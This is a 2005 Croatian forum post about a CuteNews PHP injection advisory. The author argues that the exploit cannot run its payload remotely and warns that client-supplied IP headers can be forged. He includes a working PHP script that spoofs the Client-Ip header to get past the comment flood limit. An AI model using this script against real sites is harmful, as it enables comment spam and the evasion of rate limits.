Forum FAQForum FAQSearchSearch MemberlistMemberlist Forum ignore listForum ignore list RegisterRegister ProfileProfile Log in to check your private messagesLog in to check your private messages Log inLog in
HTTP_NONO (cutenews exploit)

 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Server-side
View previous topic :: View next topic  
Author Message
scip



Joined: 19 May 2005
Posts: 25
Location: osijek
PostPosted: 29.09.2005 06:29    Post subject: HTTP_NONO (cutenews exploit) Add user to your forum ignore list Reply with quote
Ima već neko vrijeme kako se pojavilo ovo:
http://rgod.altervista.org/cutenews140.html
ukratko, moguće je inđektirat php kod u /data/flood.db.php i potom ga izvršiti čistim pozivom na fajl .. tako bar piše ..
e sad, da exploit postoji to je točno, inđekšn je moguć, ali poziv na fajl nije. cute dolazi sa .htaccess-om u data folderu koji kaže 'Deny from all; Allow from 127.0.0.1' što znači da se fajl flood.db.php ne može pozvat izvana.
Sve ovo se odnosi i na cutenews 1.3.6.

Nemojte se nikada pouzdati u HTTP_CLIENT_IP,HTTP_X_FORWARDED_FOR i slične jer su to informacije koje pruža browser i mogu se lako fejkat. REMOTE_ADDR vam daje server. držite se toga. ( teže je mijenjati proxije nego HTTP_CLIENT_IP Smile );

Primjer (sa par prepravaka ovo bi bio cutenews comment flooder):

Code:
<?php
$url="http://127.0.0.1/cutenews.1.4.0/example1.php?subaction=showcomments&id=1127777629&archive=&start_from=&ucat=&";
$post="name=flooder&mail=&comments=flood&submit=Add+My+Comment&subaction=addcomment&ucat=&show=";

$url_info=parse_url($url);
$port = isset($url_info['port']) ? $url_info['port'] : 80;
$fp=fsockopen($url_info['host'], $port, $errno, $errstr, 30);
       
if($fp)
{
$zahtjev = "POST ".@$url_info['path']."?".@$url_info['query']." HTTP/1.1\r\nHost: ".@$url_info['host']."\r\n";     
$zahtjev .="Client-Ip: ".rand()."\r\n";
$zahtjev .="Connection: Keep-Alive\r\n";
$zahtjev .="Content-Type: application/x-www-form-urlencoded\r\n";
$zahtjev .="Content-Length: ".strlen($post)."\r\n\r\n";
$zahtjev .=$post;
fputs($fp, $zahtjev);
         
fclose($fp);
}
?>


ps onaj exploit nije pisao php-ovac jer nijedan koji drži do sebe nebi naveo:
# make these changes in php.ini if you have troubles with this script:
#register_globals = on
.. mislim stvarno ... Smile

_________________
Let Your Bookmarks Define You ..
Back to top
View user's profile Send private message
Display posts from previous:   
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Server-side All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group